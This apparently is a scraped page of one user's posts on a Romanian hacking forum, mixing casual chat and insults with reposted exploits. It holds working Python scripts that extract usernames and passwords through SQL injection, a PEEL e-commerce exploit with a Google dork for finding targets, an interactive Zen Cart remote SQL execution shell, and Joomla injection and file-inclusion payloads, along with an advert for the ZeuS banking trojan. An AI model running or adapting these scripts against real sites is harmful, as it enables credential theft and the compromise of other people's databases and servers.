hozarares

Chestia asta este ea insasi "malware".......

In videoclipul de mai jos ,"zburatorul" este o constructie 100% germana din bani 100% indieni ( rupii).E uimitor faptul ca in ultimii 20 ani ( sa nu spun 15 ) , India a cunoscut o dezvoltare economica , industriala si tehnologica , extrem de gigantesca, asemanatoare in proportie de 75% cu cea a Chinei ( cea mai mare putere economica ).Daca nu stiti cum , raspunsul e simplu: cumparand " minti extraordinare" din Germania , Anglia, Romania, Japonia, etc, pe BANI GREI .Rezultatul este uimitor chiar daca pana la sfarsitul lumii vor mai exista diferente sociale in aceasta tara.Oare am putea sa ajungem din nou "granarul Europei" in urmatorii 10 ani , avand in vedere imprumuturile masive din primii 15 ani de dupa `89 ? Video YouTube - mav08_onboardmission.avi Link News - Ascending Technologies GmbH

# Title: Joomla Component com_hotbrackets Blind SQL Injection Vulnerability # EDB-ID: 10953 # CVE-ID: () # OSVDB-ID: () # Author: FL0RiX # Published: 2010-01-03 view sourceprint?<------------------- header data start ------------------- > ############################################################# # Joomla Component com_hotbrackets Blind SQL injection Vulnerability ############################################################# # author : Fl0riX # Name : com_hotbrackets # Bug Type : Blind SQL Injection # Infection : Admin login bilgileri al?nabilir. # Demo Vuln. : TRUE(+) » server and 1=1 FALSE(-) » server and 1=0 # Bug Fix Advice : Zararl? karakterler filtrelenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > path/index.php?option=com_hotbrackets&id=[blind] < -- bug code end of -- > ########################################################## Nu a fost verificata aceata vulnerabilitate dar cred ca functioneaza doar pe site`urile turcesti , arabe , iraniene si cateva italiene......

Ce preturi ai ? Daca m`i se pare ok iti fac io comanda .... daca nu , pa si pusi !!!

#!/usr/bin/python #SQL injection data extract #This script will help extract the data #in concat(). Use char(58) as your splitter. #Example: concat_ws(char(58),user,pass) #Put NUM in the site address for the number #to incrament. #Example: #www.site.com/news.php?id=-1+union+select+1,concat_ws(char(58),user,pass),3+from+users+limit+NUM,1 #www.site.com/news.php?id=-1+union+select+1,concat(char(58),email),3+from+users+limit+NUM,1 #www.rocracker.ro #office@rocracker.ro #Range of incraments. START = 0 FINISH = 35 #File to save data. FILE_NAME = "database.txt" #Add proxy support: Format 127.0.0.1:8080 proxy = "None" import urllib, sys, re, socket, httplib, urllib2 def StripTags(text): finished = 0 while not finished: finished =1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text print "\n\t rocracker@rocracker.ro SQL/DataExt v1.1" print "\t------------------------------------------" if len(sys.argv) != 2: print "\n\tUsage: ./dataext.py <site>" print "\n\tEx: ./dataext.py www.site.com/news.php?id=-1+union+select+1,concat_ws(char(58),user,pass),3+from+users+limit+NUM,1\n" print "\tEx: ./dataext.py www.site.com/news.php?id=-1+union+select+1,concat(char(58),user),3+from+users+limit+NUM,1\n" sys.exit(1) site = sys.argv[1] if site[:7] != "http://" and site[:8] != "https://": site = "http://"+site if site.find("NUM") == -1: print "\n[-] Site must contain \'NUM\'\n" sys.exit(1) if site.find("char(58)") == -1: print "\n[-] Site must contain \'char(58)\'\n" sys.exit(1) site = site.replace("char(58)","char(58,58)") try: if proxy != "None": print "\n[+] Testing Proxy..." h2 = httplib.HTTPConnection(proxy) h2.connect() print "[+] Proxy:",proxy print "[+] Building Handler" proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) else: print "\n[-] Proxy Not Given" proxy_handler = "None" except(socket.timeout): print "\n[-] Proxy Timed Out" sys.exit(1) except(), msg: print msg print "\n[-] Proxy Failed" sys.exit(1) file = open(FILE_NAME, "a") print "\n[+] Starting Extraction...\n" for num in xrange(START,FINISH+1): num = str(num) print "[+] Testing:",num if proxy_handler != "None": opener = urllib2.build_opener(proxy_handler) else: opener = urllib2.build_opener() source = opener.open(site.replace("NUM",num)).read() try: match = re.findall("\S+::\S+",StripTags(source))[0] if len(match) >= 1: match = match.split("::") match = match[0]+":"+match[1][:32] except(IndexError): match = re.findall("::\S+",StripTags(source)) if len(match) >= 1: match = match[0].split("::")[1] pass if len(match) >= 1: file.writelines(match+"\n") print "[+] Wrote:",match else: print "[-] No Data Found" file.close() print "\n[-] Done\n"

Terms and conditions Please note that the software you download and install during the Giveaway period comes with the following important limitations: 1) No free technical support 2) No free upgrades to future versions 3) Strictly non-commercial usage

#!/usr/bin/python # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # ################################################################ # # # Vuln discovered by banjirian # import os, sys, time, re, urllib2, httplib, socket if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) proxy = "None" count = 0 if len(sys.argv) < 2 or len(sys.argv) > 4: print "\n|---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 06/2009 PEEL e-commerce |" print "| Vuln discovered by banjirian |" print "| Usage: peel.py http://www.site.com/ |" print "| Visit Ljuska v2 :: Forums - Index page |" print "|---------------------------------------------------------------|\n" sys.exit(1) for arg in sys.argv: if arg == '-h': print "\n|-------------------------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 06/2009 PEEL e-commerce |" print "| Vuln discovered by banjirian |" print "| Usage: peel.py www.site.com |" print "| Example: pell.py ACKSOFT |" print "| Visit Ljuska v2 :: Forums - Index page |" print "|-------------------------------------------------------------------------------|\n" sys.exit(1) elif arg == '-p': proxy = sys.argv[count+1] count += 1 site = sys.argv[1] if site[:4] != "http": site = "http://"+site if site[-1] != "/": site = site + "/" print "\n|---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 06/2009 PEEL e-commerce |" print "| Vuln discovered by banjirian |" print "| Visit Ljuska v2 :: Forums - Index page |" print "|---------------------------------------------------------------|\n" print "\n[-] %s" % time.strftime("%X") socket.setdefaulttimeout(20) try: if proxy != "None": print "[+] Proxy:",proxy print "\n[+] Testing Proxy..." pr = httplib.HTTPConnection(proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) proxyfier = urllib2.build_opener(proxy_handler) proxyfier.open("http://www.google.com") print print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working" print else: print "[-] Proxy not given" print proxy_handler = urllib2.ProxyHandler() except(socket.timeout): print print "\t[-] Proxy Timed Out" print sys.exit(1) except(),msg: print msg print "\t[-] Proxy Failed" print sys.exit(1) try: url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address=" except(IndexError): print "[-] Wtf?" proxyfier = urllib2.build_opener(proxy_handler) proxy_check = proxyfier.open(url).readlines() for line in proxy_check: if re.search("<br><br>", line): line = line.replace("</b>","").replace('<br>',"").replace('<b>',"") print "\n[!]",line,"\n" print "[+] Target:",site print "[+] Exploiting...\n" try: check = proxyfier.open(site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),3+from+peel_utilisateurs--').read() if re.findall("baltazar", check): print "[!] w00t!,w00t!: ",site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe),3+from+peel_utilisateurs--' print else: print "[-] Can't exploit :(" print except(urllib2.HTTPError): pass except(KeyboardInterrupt, SystemExit): pass print "[!] Use this google dork for finding targets" print "\tinurl:lire/index.php?rubid=\n" print "\n[-] %s" % time.strftime("%X") #################################################### Mai vechi dar inca merge foarte bine ......

#!/usr/bin/python # # ------- Zen Cart 1.3.8a Remote SQL Execution # ecommerce shopping cart software by Zen Cart ecommerce solution # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # The new version (1.3.8a) : ecommerce shopping cart software by Zen Cart ecommerce solution # # 33333333333 # # # Notes: must have admin/sqlpatch.php enabled # # clean the database : # DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1); # DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php'; import urllib, urllib2, re, sys a,b = sys.argv,0 def option(name, need = 0): global a, b for param in sys.argv: if(param == '-'+name): return str(sys.argv[b+1]) b = b + 1 if(need): print '\n#error', "-"+name, 'parameter required' exit(1) if (len(sys.argv) < 2): print """ =____________ Zen Cart 1.3.8a Remote SQL Execution Exploit ____________= ======================================================================== | 3333333333333333333 | ======================================================================== | | | $system> python """+sys.argv[0]+""" -url <url> | | Param: <url> ex: http://victim.com/site (no slash) | | | | Note: blind "injection" | ======================================================================== """ exit(1) url, trick = option('url', 1), "/password_forgotten.php" while True: cmd = raw_input('sql@jah$ ') if (cmd == "exit"): exit(1) req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd})) if (re.findall('1 statements processed',urllib2.urlopen(req).read())): print '>> success (', cmd, ")" else: print '>> failed, be sure to end with ; (', cmd, ")"

sa traiesti 1000 ani lumina si`un fu7@!

Asta`i teapa pe fata !!! Te`ai tampit ? Tu noua vrei sa ne vinzi chestia aia ? De ce nu gratis ? Crezi ca esti mai interesant daca ceri bani de la romani ? Muta`ti cuibu` pe un forum arab sau paki ..... hai executarea, dickhead !!! 50$ - ZeuS 1.2.7.19 With FireFox Module Enabled - Opensc.ws - Trojan programming forum priv8 Zeus 1.2.9.0 with Firefox - Opera Last [FROZEN] - Opensc.ws - Trojan programming forum

############################################################### ## Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablities ## ## REZERVI ## ############################################################### PoC r00t : [r00t.h4x0r]/include/mail.inc.php?root=[shell]

# Title: Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability # EDB-ID: 10971 # CVE-ID: () # OSVDB-ID: () # Author: R3d-D3v!L # Published: 2010-01-03 # Verified: no # Download Exploit Code # Download N/A view sourceprint? [?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? [?] [~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection [~] Vendor: .joomlabamboo.com [?] Software:Joomla Bamboo Simpla Admin Template [-] [?] author: ((R3d-D3v!L)) [?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY [?] contact: N/A [-] [?] Date: 3.Jan.2010 [?] T!ME: 09:15 am GMT [?] Home: XP10_hackEr [?] [?] [-]??????????????????????{DEV!L'5 of SYST3M}?????????????????? [*] Err0r C0N50L3: http://server/P47H/index.php?option=com_content&view=article&id= {EV!L EXPLO!T} [~] {EV!L EXPLO!T}: -666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

la cum te`ai exprimat , io inteleg ca ar trebui sa cuplezi un cablu la mufe si sa`i instalezi castile pe urechiuse la sora`ta....

la cum te`ai exprimat , io inteleg ca ar trebui sa cuplezi un cablu la mufe si sa`i instalezi castile pe urechiuse la sora`ta....

Intreaba la Arhivele Nationale daca mai au loc acolo .....

Mancare ca`n Cluj , iar pe langa asta merge un PORROS combinat cu Alexandrion+RedBull, femei sunt , muzica`i buna ....sa fim sanatosi si AN NOU FERICITI TUTUROR !!!

pai nu`i nime`...is toti pe RST

Westernunion scam link sters

Da fa upload la script pe MegaUpload, porfavor.....

Da`mi te rog invitatia pe iplay .Merci anticipat

Craciun Fericit tuturor utilizatorilor RST.Sa aveti parte de un Craciun linistit, fericit si multumitor in familie sau cu prietenii. Hoza Rares si Jack Cluj-Napoca, 24.12.2009

Virtual private network - Wikipedia Nu exista o securitate 100% ale VPN`urilor. Eu folosesc AnchorFree , gratis si destul de sigur. AnchorFree

Frumos , frumos ...... ))))))))))) Da ce naspa`i ala la moaca ....

daca iti arata chestiile alea in forma de litera A , inseamna ca este eroare .....Folosesc si SQLMap si Pangolin......

Host4All.Ro - Servicii web pt. toate buzunarele :: WebHosting / Inregistrare Domenii / Servere / WebDesign / Printing / IRC Hosting